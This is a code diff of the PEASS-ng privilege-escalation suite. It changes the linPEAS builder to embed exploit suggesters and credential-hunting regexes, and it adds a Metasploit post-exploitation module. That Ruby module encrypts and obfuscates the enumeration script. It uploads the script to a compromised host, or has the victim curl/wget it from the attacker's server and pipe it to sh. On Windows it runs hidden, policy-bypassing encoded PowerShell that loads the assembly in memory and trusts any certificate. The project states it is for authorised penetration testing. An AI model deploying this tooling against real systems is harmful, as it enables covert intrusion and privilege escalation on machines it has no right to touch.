+        print("[+] Building temporary linpeas_base.sh...")
+        checks = []
+        for part in LINPEAS_PARTS:
+            name = part["name"]
+            assert name, f"Name not found in {part}"
+            name_check = part["name_check"]
+            assert name_check, f"Name not found in {name_check}"
+            file_path = part["file_path"]
+            assert file_path, f"Name not found in {file_path}"
+
+            with open(file_path, 'r') as file:
+                linpeas_part = file.read()
+
+            checks.append(name_check)
+            self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check}; then\n"
+            self.linpeas_base += f'print_title "{name}"\n'
+            self.linpeas_base += linpeas_part
+            self.linpeas_base += f"\nfi\necho ''\necho ''\n"
+            self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n'
+
+        self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks))
+
+        with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f:
+            f.write(self.linpeas_base)

linPEAS/builder/src/linpeasBuilder.py

@@ -1,11 +1,13 @@
 import re
 import requests
+import base64
+import os
 
 from .peasLoaded import PEASLoaded
 from .peassRecord import PEASRecord
 from .fileRecord import FileRecord
 from .yamlGlobals import (
-    LINPEAS_BASE_PATH,
+    TEMPORARY_LINPEAS_BASE_PATH,
     PEAS_FINDS_MARKUP,
     PEAS_STORAGES_MARKUP,
     PEAS_STORAGES_MARKUP,
@@ -24,7 +26,11 @@ from .yamlGlobals import (
     SUDOVB1_MARKUP,
     SUDOVB2_MARKUP,
     CAP_SETUID_MARKUP,
-    CAP_SETGID_MARKUP
+    CAP_SETGID_MARKUP,
+    LES_MARKUP,
+    LES2_MARKUP,
+    REGEXES_LOADED,
+    REGEXES_MARKUP
 )
 
 
@@ -35,7 +41,7 @@ class LinpeasBuilder:
         self.bash_find_f_vars, self.bash_find_d_vars = set(), set()
         self.bash_storages = set()
         self.__get_files_to_search()
-        with open(LINPEAS_BASE_PATH, 'r') as file:
+        with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file:
             self.linpeas_sh = file.read()
 
     def build(self):
@@ -75,6 +81,18 @@ class LinpeasBuilder:
         
         self.__replace_mark(EXTRASECTIONS_MARKUP, list(""), "") #Delete extra markup
 
+        print("[+] Building regexes searches...")
+        section = self.__generate_regexes_search()
+        self.__replace_mark(REGEXES_MARKUP, list(section), "")
+
+
+        print("[+] Building linux exploit suggesters...")
+        les_b64, les2_b64 = self.__get_linux_exploit_suggesters()
+        assert len(les_b64) > 100
+        assert len(les2_b64) > 100
+        self.__replace_mark(LES_MARKUP, list(les_b64), "")
+        self.__replace_mark(LES2_MARKUP, list(les2_b64), "")
+
         print("[+] Building GTFOBins lists...")
         suidVB, sudoVB, capsVB = self.__get_gtfobins_lists()
         assert len(suidVB) > 185, f"Len suidVB is {len(suidVB)}"
@@ -197,7 +215,8 @@ class LinpeasBuilder:
 
         for precord in self.ploaded.peasrecords:
             if precord.auto_check:
-                section = f'  print_2title "Analyzing {precord.name.replace("_"," ")} Files (limit 70)"\n'
+                section = f'if [ "$PSTORAGE_{precord.bash_name}" ] || [ "$DEBUG" ]; then\n'
+                section += f'  print_2title "Analyzing {precord.name.replace("_"," ")} Files (limit 70)"\n'
 
                 for exec_line in precord.exec:
                     if exec_line:
@@ -206,6 +225,8 @@ class LinpeasBuilder:
                 for frecord in precord.filerecords:
                     section += "    " + self.__construct_file_line(precord, frecord) + "\n"
                 
+                section += "fi\n"
+                
                 sections[precord.name] = section
 
         return sections
@@ -217,7 +238,7 @@ class LinpeasBuilder:
         
         analise_line = ""
         if init:
-            analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then echo_not_found "'+frecord.regex+'"; fi; '
+            analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; '
             analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; '
 
         #If just list, just list the file/directory
@@ -233,6 +254,7 @@ class LinpeasBuilder:
             grep_only_bad_lines = f' | grep -E "{frecord.bad_regex}"' if frecord.bad_regex else ""
             grep_remove_regex = f' | grep -Ev "{frecord.remove_regex}"' if frecord.remove_regex else ""
             sed_bad_regex = ' | sed -${E} "s,'+frecord.bad_regex+',${SED_RED},g"' if frecord.bad_regex else ""
+            sed_very_bad_regex = ' | sed -${E} "s,'+frecord.very_bad_regex+',${SED_RED_YELLOW},g"' if frecord.very_bad_regex else ""
             sed_good_regex = ' | sed -${E} "s,'+frecord.good_regex+',${SED_GOOD},g"' if frecord.good_regex else ""
 
             if init:
@@ -255,6 +277,9 @@ class LinpeasBuilder:
             if sed_bad_regex:
                 analise_line += sed_bad_regex
             
+            if sed_very_bad_regex:
+                analise_line += sed_very_bad_regex
+
             if sed_good_regex:
                 analise_line += sed_good_regex
             
@@ -266,11 +291,18 @@ class LinpeasBuilder:
             for ffrecord in frecord.files:
                 ff_real_regex = ffrecord.regex[1:] if ffrecord.regex.startswith("*") and ffrecord.regex != "*" else ffrecord.regex
                 ff_real_regex = ff_real_regex.replace("*",".*")
-                analise_line += 'for ff in $(find "$f" -name "'+ffrecord.regex+'"); do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False)
+                #analise_line += 'for ff in $(find "$f" -name "'+ffrecord.regex+'"); do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False)
+                analise_line += 'find "$f" -name "'+ffrecord.regex+'" | while read ff; do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False)
 
         analise_line += 'done; echo "";'
         return analise_line
 
+    
+    def __get_linux_exploit_suggesters(self) -> tuple:
+        r1 = requests.get("https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh")
+        r2 = requests.get("https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl")
+        return(base64.b64encode(bytes(r1.text, 'utf-8')).decode("utf-8"), base64.b64encode(bytes(r2.text, 'utf-8')).decode("utf-8"))
+    
     def __get_gtfobins_lists(self) -> tuple:
         r = requests.get("https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins")
         bins = re.findall(r'/GTFOBins/GTFOBins.github.io/blob/master/_gtfobins/([\w_ \-]+).md', r.text)
@@ -290,12 +322,45 @@ class LinpeasBuilder:
         
         return (suidVB, sudoVB, capsVB)
     
+    def __generate_regexes_search(self) -> str:
+        paths_to_search = REGEXES_LOADED["paths"]
+        regexes = REGEXES_LOADED["regular_expresions"]
+
+        regexes_search_section = ""
+
+        for values in regexes:
+            section_name = values["name"]
+            regexes_search_section += f'print_2title "Searching {section_name}"\n'
+
+            for entry in values["regexes"]:
+                name = entry["name"]
+                regex = entry["regex"]
+                regex = regex.replace('"', '\\"').strip()
+                extra_grep = entry.get("extra_grep")
+                extra_grep = f"| grep {extra_grep}" if extra_grep else ""
+                
+                regexes_search_section += f'print_3title "Searching {name} (limited to 50)"\n'
+                for path in paths_to_search:
+                    regexes_search_section += "timeout 120 find "+path+" -type f -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} \"s~"+regex+"~${SED_RED}~\" &\n"
+                
+                regexes_search_section += "wait\n"
+            
+            regexes_search_section += "echo ''\n"
+
+        return regexes_search_section
+
+                        
+
 
     def __replace_mark(self, mark: str, find_calls: list, join_char: str):
         """Substitude the markup with the actual code"""
+        
         self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed
     
     def write_linpeas(self, path):
         """Write on disk the final linpeas"""
+        
         with open(path, "w") as f:
             f.write(self.linpeas_sh)
+        
+        os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file

linPEAS/builder/src/yamlGlobals.py

@@ -2,14 +2,62 @@ import os
 import yaml
 
 CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
-LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh"
+
+LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts"
+LINPEAS_PARTS = [
+    {
+        "name": "System Information",
+        "name_check": "system_information",
+        "file_path": LINPEAS_BASE_PARTS + "/1_system_information.sh"
+    },
+    {
+        "name": "Container",
+        "name_check": "container",
+        "file_path": LINPEAS_BASE_PARTS + "/2_container.sh"
+    },
+    {
+        "name": "Processes, Crons, Timers, Services and Sockets",
+        "name_check": "procs_crons_timers_srvcs_sockets",
+        "file_path": LINPEAS_BASE_PARTS + "/3_procs_crons_timers_srvcs_sockets.sh"
+    },
+    {
+        "name": "Network Information",
+        "name_check": "network_information",
+        "file_path": LINPEAS_BASE_PARTS + "/4_network_information.sh"
+    },
+    {
+        "name": "Users Information",
+        "name_check": "users_information",
+        "file_path": LINPEAS_BASE_PARTS + "/5_users_information.sh"
+    },
+    {
+        "name": "Software Information",
+        "name_check": "software_information",
+        "file_path": LINPEAS_BASE_PARTS + "/6_software_information.sh"
+    },
+    {
+        "name": "Interesting Files",
+        "name_check": "interesting_files",
+        "file_path": LINPEAS_BASE_PARTS + "/7_interesting_files.sh"
+    }
+]
+
+
+LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh"
+TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh"
 FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh"
 YAML_NAME = "sensitive_files.yaml"
+YAML_REGEXES = "regexes.yaml"
 FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME
+REGEXES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_REGEXES
+
 
 with open(FILES_YAML, 'r') as file:
     YAML_LOADED = yaml.load(file, Loader=yaml.FullLoader)
 
+with open(REGEXES_YAML, 'r') as file:
+    REGEXES_LOADED = yaml.load(file, Loader=yaml.FullLoader)
+
 ROOT_FOLDER = YAML_LOADED["root_folders"]
 DEFAULTS = YAML_LOADED["defaults"]
 COMMON_FILE_FOLDERS = YAML_LOADED["common_file_folders"]
@@ -18,10 +66,12 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS)
 assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS)
 
 
+PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"]
 PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"]
 FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"]
 FIND_TEMPLATE = YAML_LOADED["find_template"]
 
+REGEXES_MARKUP = YAML_LOADED["peas_regexes_markup"]
 PEAS_STORAGES_MARKUP = YAML_LOADED["peas_storages_markup"]
 STORAGE_LINE_MARKUP = YAML_LOADED["storage_line_markup"]
 STORAGE_LINE_EXTRA_MARKUP = YAML_LOADED["storage_line_extra_markup"]
@@ -40,3 +90,6 @@ SUDOVB1_MARKUP = YAML_LOADED["sudoVB1_markup"]
 SUDOVB2_MARKUP = YAML_LOADED["sudoVB2_markup"]
 CAP_SETUID_MARKUP = YAML_LOADED["cap_setuid_markup"]
 CAP_SETGID_MARKUP = YAML_LOADED["cap_setgid_markup"]
+
+LES_MARKUP = YAML_LOADED["les_markup"]
+LES2_MARKUP = YAML_LOADED["les2_markup"]

metasploit/README.md

@@ -0,0 +1,74 @@
+# PEASS Post Exploitation Module for Metasploit
+
+You can use this module to **automatically execute a PEASS script from a meterpreter or shell session obtained in metasploit**.
+
+## Manual Installation
+Copy the `peass.rb` file to the path `modules/post/multi/gather/` inside the metasploit installation.
+
+In Kali: 
+```bash
+sudo cp ./peass.rb /usr/share/metasploit-framework/modules/post/multi/gather/
+# or
+sudo wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/metasploit/peass.rb -O /usr/share/metasploit-framework/modules/post/multi/gather/peass.rb
+```
+
+Now you can do `reload_all` inside a running msfconsole or the next time you launch a new msfconsole the peass module will be **automatically loaded**.
+
+## How to use it
+```
+msf6 exploit(multi/handler) > use post/multi/gather/peass
+msf6 post(multi/gather/peass) > show info
+
+       Name: Multi PEASS launcher
+     Module: post/multi/gather/peass
+   Platform: BSD, Linux, OSX, Unix, Windows
+       Arch: 
+       Rank: Normal
+
+Provided by:
+  Carlos Polop <@carlospolopm>
+
+Compatible session types:
+  Meterpreter
+  Shell
+
+Basic options:
+  Name        Current Setting                                                           Required  Description
+  ----        ---------------                                                           --------  -----------
+  PARAMETERS                                                                            no        Parameters to pass to the script
+  PASSWORD    um1xipfws17nkw1bi1ma3bh7tzt4mo3e                                          no        Password to encrypt and obfuscate the script (randomly generated). The length must be 32B. If no password is set, only base64 will be used
+                                                                                                  .
+  PEASS_URL   https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/wi  yes       Path to the PEASS script. Accepted: http(s):// URL or absolute local path. Linpeas: https://raw.githubusercontent.com/carlospolop/PEASS-ng
+              nPEASexe/binaries/Obfuscated%20Releases/winPEASany.exe                              /master/linPEAS/linpeas.sh
+  SESSION                                                                               yes       The session to run this module on.
+  SRVHOST                                                                               no        Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.
+  SRVPORT     443                                                                       no        Port to download the PEASS script from using http(s) (only used if SRVHOST)
+  SSL         true                                                                      no        Indicate if you want to communicate with https (only used if SRVHOST)
+  SSLCert                                                                               no        Path to a custom SSL certificate (default is randomly generated)
+  TEMP_DIR                                                                              no        Path to upload the obfuscated PEASS script inside the compromised machine. By default "C:\Windows\System32\spool\drivers\color" is used in
+                                                                                                   Windows and "/tmp" in Unix.
+  TIMEOUT     900                                                                       no        Timeout of the execution of the PEASS script (15min by default)
+  URIPATH     /mvpo.txt                                                                 no        URI path to download the script from there (only used if SRVHOST)
+
+Description:
+  This module will launch the indicated PEASS (Privilege Escalation 
+  Awesome Script Suite) script to enumerate the system. You need to 
+  indicate the URL or local path to LinPEAS if you are in some Unix or 
+  to WinPEAS if you are in Windows. By default this script will upload 
+  the PEASS script to the host (encrypted and/or encoded) and will 
+  load it and execute it. You can configure this module to download 
+  the encrypted/encoded PEASS script from this metasploit instance via 
+  HTTP instead of uploading it.
+
+References:
+  https://github.com/carlospolop/PEASS-ng
+  https://www.youtube.com/watch?v=9_fJv_weLU0
+```
+
+The options are pretty self-explanatory.
+
+Notice that **by default** the obfuscated PEASS script if going to be **uploaded** but if you **set SRVHOST it will be downloaded** via http(s) from the metasploit instance (**so nothing will be written in the disk of the compromised host**).
+
+Notice that you can **set parametes** like `-h` in `PARAMETERS` and then linpeas/winpeas will just show the help (*just like when you execute them from a console*).
+
+**IMPORTANT**: You won't see any output until the execution of the script is completed.

metasploit/peass.rb

@@ -0,0 +1,340 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'net/http'
+require 'base64'
+require 'openssl'
+require 'tempfile'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'           => 'Multi PEASS launcher',
+      'Description'    => %q{
+          This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
+          You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
+          By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
+          You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Carlos Polop <@carlospolopm>'
+        ],
+      'Platform'       => %w{ bsd linux osx unix win },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'References' =>
+          [
+            ['URL', 'https://github.com/carlospolop/PEASS-ng'],
+            ['URL', 'https://www.youtube.com/watch?v=9_fJv_weLU0'],
+          ]
+    ))
+    register_options(
+      [
+        OptString.new('PEASS_URL', [true, 'Path to the PEASS script. Accepted: http(s):// URL or absolute local path. Linpeas: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh', "https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASany.exe"]),
+        OptString.new('PASSWORD', [false, 'Password to encrypt and obfuscate the script (randomly generated). The length must be 32B. If no password is set, only base64 will be used.', rand(36**32).to_s(36)]),
+        OptString.new('TEMP_DIR', [false, 'Path to upload the obfuscated PEASS script inside the compromised machine. By default "C:\Windows\System32\spool\drivers\color" is used in Windows and "/tmp" in Unix.', '']),
+        OptString.new('PARAMETERS', [false, 'Parameters to pass to the script', nil]),
+        OptString.new('TIMEOUT', [false, 'Timeout of the execution of the PEASS script (15min by default)', 15*60]),
+        OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']),
+        OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]),
+        OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]),
+        OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', "/" + rand(36**4).to_s(36) + ".txt"])
+      ])
+    
+    @temp_file_path = ""
+  end
+
+  def run
+    ps_var1 = rand(36**5).to_s(36) #Winpeas PS needed variable
+
+    # Load PEASS script in memory
+    peass_script = load_peass()
+    print_good("PEASS script successfully retreived.")
+
+    # Obfuscate loaded PEASS script
+    if datastore["PASSWORD"].length > 1
+      # If no Windows, check if openssl exists
+      if !session.platform.include?("win")
+        openssl_path = cmd_exec("command -v openssl")
+        raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
+      end
+
+      # Get encrypted PEASS script in B64
+      print_status("Encrypting PEASS and encoding it in Base64...")
+      
+      # Needed code to decrypt from unix
+      if !session.platform.include?("win")
+        aes_enc_peass_ret = aes_enc_peass(peass_script)
+        peass_script_64 = aes_enc_peass_ret["encrypted"]
+        key_hex = aes_enc_peass_ret["key_hex"]
+        iv_hex = aes_enc_peass_ret["iv_hex"]
+        decode_linpeass_cmd = "openssl aes-256-cbc -base64 -d -K #{key_hex} -iv #{iv_hex}"
+      
+      # Needed code to decrypt from Windows
+      else
+        # As the PS function is only capable of decrypting readable strings
+        # in Windows we encrypt the B64 of the binary and then load it in memory 
+        # from the initial B64. Then: original -> B64 -> encrypt -> B64
+        aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) #Base64 before encrypting it
+        peass_script_64 = aes_enc_peass_ret["encrypted"]
+        key_b64 = aes_enc_peass_ret["key_b64"]
+        iv_b64 = aes_enc_peass_ret["iv_b64"]
+        load_winpeas = get_ps_aes_decr()
+        
+        ps_var2 = rand(36**6).to_s(36)
+        load_winpeas += "$#{ps_var2} = DecryptStringFromBytesAes \"#{key_b64}\" \"#{iv_b64}\" $#{ps_var1};"
+        load_winpeas += "$#{rand(36**7).to_s(36)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var2}));"
+      end
+    
+    else
+      # If no Windows, check if base64 exists
+      if !session.platform.include?("win")
+        base64_path = cmd_exec("command -v base64")
+        raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
+      end
+
+      # Encode PEASS script
+      print_status("Encoding PEASS in Base64...")
+      peass_script_64 = Base64.encode64(peass_script)
+
+      # Needed code to decode it in Unix and Windows
+      decode_linpeass_cmd = "base64 -d"
+      load_winpeas = "$#{rand(36**6).to_s(36)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var1}));"
+    
+    end
+    
+    # Write obfuscated PEASS to a local file
+    file = Tempfile.new('peass_metasploit')
+    file.write(peass_script_64)
+    file.rewind
+    @temp_file_path = file.path
+
+    if datastore["SRVHOST"] == ""
+      # Upload file to victim
+      temp_peass_name = rand(36**5).to_s(36)
+      if datastore["TEMP_DIR"] != ""
+        temp_path = datastore["TEMP_DIR"]
+        if temp_path[0] == "/"
+          temp_path = temp_path + "/#{temp_peass_name}"
+        else
+          temp_path = temp_path + "\\#{temp_peass_name}"
+        end
+      
+      elsif session.platform.include?("win")
+        temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}"
+      else
+        temp_path = "/tmp/#{temp_peass_name}"
+      end
+      
+      print_status("Uploading obfuscated peass to #{temp_path}...")
+      upload_file(temp_path, file.path)
+      print_good("Uploaded")
+
+      #Start the cmd, prepare to read from the uploaded file
+      if session.platform.include?("win")
+        cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};"
+        last_cmd = "del #{temp_path};"
+      else
+        cmd = "cat #{temp_path}"
+        last_cmd = " ; rm #{temp_path}"
+      end
+
+    # Instead of writting the file to disk, download it from HTTP
+    else
+      last_cmd = ""
+      # Start HTTP server
+      start_service()
+
+      http_protocol = datastore["SSL"] ? "https://" : "http://"
+      http_ip = datastore["SRVHOST"]
+      http_port = ":#{datastore['SRVPORT']}"
+      http_path = datastore["URIPATH"]
+      url_download_peass = http_protocol + http_ip + http_port + http_path      
+      print_good("Listening in #{url_download_peass}")
+      
+      # Configure the download of the scrip in Windows
+      if session.platform.include?("win")
+        cmd = "$ProgressPreference = 'SilentlyContinue';"
+        cmd += get_bypass_tls_cert()
+        cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
+      
+      # Configure the download of the scrip in unix
+      else
+        cmd = "curl -k -s \"#{url_download_peass}\""
+        curl_path = cmd_exec("command -v curl")
+        if ! curl_path.include?("curl")
+          cmd = "wget --no-check-certificate -q -O - \"#{url_download_peass}\""
+          wget_path = cmd_exec("command -v wget")
+          raise 'Neither curl nor wget were found in victim, unset the SRVHOST option!' unless wget_path.include?("wget")
+        end
+      end
+    end
+    
+    # Run PEASS script
+    begin
+      tmpout = "\n"
+      print_status "Running PEASS..."
+
+      # If Windows, suppose Winpeas was loaded
+      if session.platform.include?("win")
+        cmd += load_winpeas
+        cmd += "$a = [winPEAS.Program]::Main(\"#{datastore['PARAMETERS']}\");"
+        cmd += last_cmd
+        # Transform to Base64 in UTF-16LE format
+        cmd_utf16le = cmd.encode("utf-16le")
+        cmd_utf16le_b64 = Base64.encode64(cmd_utf16le).gsub(/\r?\n/, "")
+        
+        tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"])
+      
+        # If unix, then, suppose linpeas was loaded
+      else
+        cmd += "| #{decode_linpeass_cmd}"
+        cmd += "| sh -s -- #{datastore['PARAMETERS']}"
+        cmd += last_cmd
+        tmpout << cmd_exec(cmd, args=nil, time_out=datastore["TIMEOUT"])
+      end
+
+      print "\n#{tmpout}\n\n"
+      command_log = store_loot("PEASS", "text/plain", session, tmpout, "peass.txt", "PEASS script execution")
+      print_good("PEASS output saved to: #{command_log}")
+    
+    rescue ::Exception => e
+      print_bad("Error Running PEASS: #{e.class} #{e}")
+    end
+    
+    # Close and delete the temporary file
+    file.close
+    file.unlink
+  end
+
+  def on_request_uri(cli, request)
+    print_status("HTTP request received")
+    send_response(cli, File.read(@temp_file_path), {'Content-Type'=>'text/plain'})
+    print_good("PEASS script sent")
+  end
+
+  def load_peass
+    # Load the PEASS script from a local file or from Internet
+    peass_script = ""
+    url_peass = datastore['PEASS_URL']
+    
+    if url_peass.include?("http://") || url_peass.include?("https://")
+      target = URI.parse url_peass
+      raise 'Invalid URL' unless target.scheme =~ /https?/
+      raise 'Invalid URL' if target.host.to_s.eql? ''
+      
+      res = Net::HTTP.get_response(target)
+      peass_script = res.body
+
+      raise "Something failed downloading PEASS script from #{url_peass}" if peass_script.length < 500
+
+    else
+      raise "PEASS local file (#{url_peass}) does not exist!" unless ::File.exist?(url_peass)        
+      peass_script = File.read(url_peass)
+      raise "Something falied reading PEASS script from #{url_peass}" if peass_script.length < 500
+    end
+
+    return peass_script
+  end
+
+  def aes_enc_peass(peass_script)
+    # Encrypt the PEASS script with aes
+    key = datastore["PASSWORD"]
+    iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
+    
+    c = OpenSSL::Cipher.new('aes-256-cbc').encrypt
+    c.iv = iv
+    c.key = key
+    encrypted = c.update(peass_script) + c.final
+    encrypted = [encrypted].pack('m')
+
+    return {
+      "encrypted" => encrypted,
+      "key_hex" => key.unpack('H*').first,
+      "key_b64" => Base64.encode64(key).strip,
+      "iv_hex" => iv.unpack('H*').first,
+      "iv_b64" => Base64.encode64(iv).strip
+    }
+  end
+
+  def get_bypass_tls_cert
+    return'
+    # Code to accept any certificate in the https connection from https://stackoverflow.com/questions/11696944/powershell-v3-invoke-webrequest-https-error
+    add-type @"
+    using System.Net;
+    using System.Security.Cryptography.X509Certificates;
+    public class TrustAllCertsPolicy : ICertificatePolicy {
+        public bool CheckValidationResult(
+            ServicePoint srvPoint, X509Certificate certificate,
+            WebRequest request, int certificateProblem) {
+            return true;
+        }
+    }
+"@
+[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy;
+'
+  end
+
+  def get_ps_aes_decr
+    # PS code to decrypt Winpeas
+    return '
+    # Taken from https://gist.github.com/Darryl-G/d1039c2407262cb6d735c3e7a730ee86
+function DecryptStringFromBytesAes([String] $key, [String] $iv, [String] $encrypted) {
+    [byte[]] $encrypted = [Convert]::FromBase64String($encrypted);
+    [byte[]] $key = [Convert]::FromBase64String($key)
+    [byte[]] $iv = [Convert]::FromBase64String($iv)
+
+    # Declare the stream used to encrypt to an in memory
+    # array of bytes.
+    [System.IO.MemoryStream] $msDecrypt
+
+    # Declare the RijndaelManaged object
+    # used to encrypt the data.
+    [System.Security.Cryptography.RijndaelManaged] $aesAlg = new-Object System.Security.Cryptography.RijndaelManaged
+
+    [String] $plainText=""
+
+    try  {
+        # Create a RijndaelManaged object
+        # with the specified key and IV.
+        $aesAlg =  new-object System.Security.Cryptography.RijndaelManaged
+        $aesAlg.Mode = [System.Security.Cryptography.CipherMode]::CBC
+        $aesAlg.KeySize = 256
+        $aesAlg.BlockSize = 128
+        $aesAlg.key = $key
+        $aesAlg.IV = $iv
+
+        # Create an encryptor to perform the stream transform.
+        [System.Security.Cryptography.ICryptoTransform] $decryptor = $aesAlg.CreateDecryptor($aesAlg.Key, $aesAlg.IV);
+
+        # Create the streams used for encryption.
+        $msDecrypt = new-Object System.IO.MemoryStream @(,$encrypted)
+        $csDecrypt = new-object System.Security.Cryptography.CryptoStream($msDecrypt, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
+        $srDecrypt = new-object System.IO.StreamReader($csDecrypt)
+
+        #Write all data to the stream.
+        $plainText = $srDecrypt.ReadToEnd()
+        $srDecrypt.Close()
+        $csDecrypt.Close()
+        $msDecrypt.Close()
+    }
+    finally {
+        # Clear the RijndaelManaged object.
+        if ($aesAlg -ne $null){
+            $aesAlg.Clear()
+        }
+    }
+
+    # Return the Decrypted bytes from the memory stream.
+    return $plainText
+}
+'
+  end
+end

winPEAS/README.md

@@ -6,6 +6,9 @@ Check the **Local Windows Privilege Escalation checklist** from **[book.hacktric
 
 Check more **information about how to exploit** found misconfigurations in **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation)**
 
+## Quick Start
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+
 ## WinPEAS .exe and .bat
 - [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat) 
 - [Link to WinPEAS C# project (.exe)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
@@ -23,8 +26,4 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
-## License
-
-MIT License
-
 By Polop<sup>(TM)</sup>

winPEAS/winPEASbat/README.md

@@ -137,8 +137,5 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
-## License
-
-MIT License
 
 By Polop<sup>(TM)</sup>

winPEAS/winPEASexe/README.md

@@ -13,25 +13,27 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
 **.Net >= 4.5.2 is required**
 
 Precompiled binaries:
-- Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
-- Non-Obfuscated [winPEASany.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe)
-- Non-Obfuscated [winPEASx64.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe)
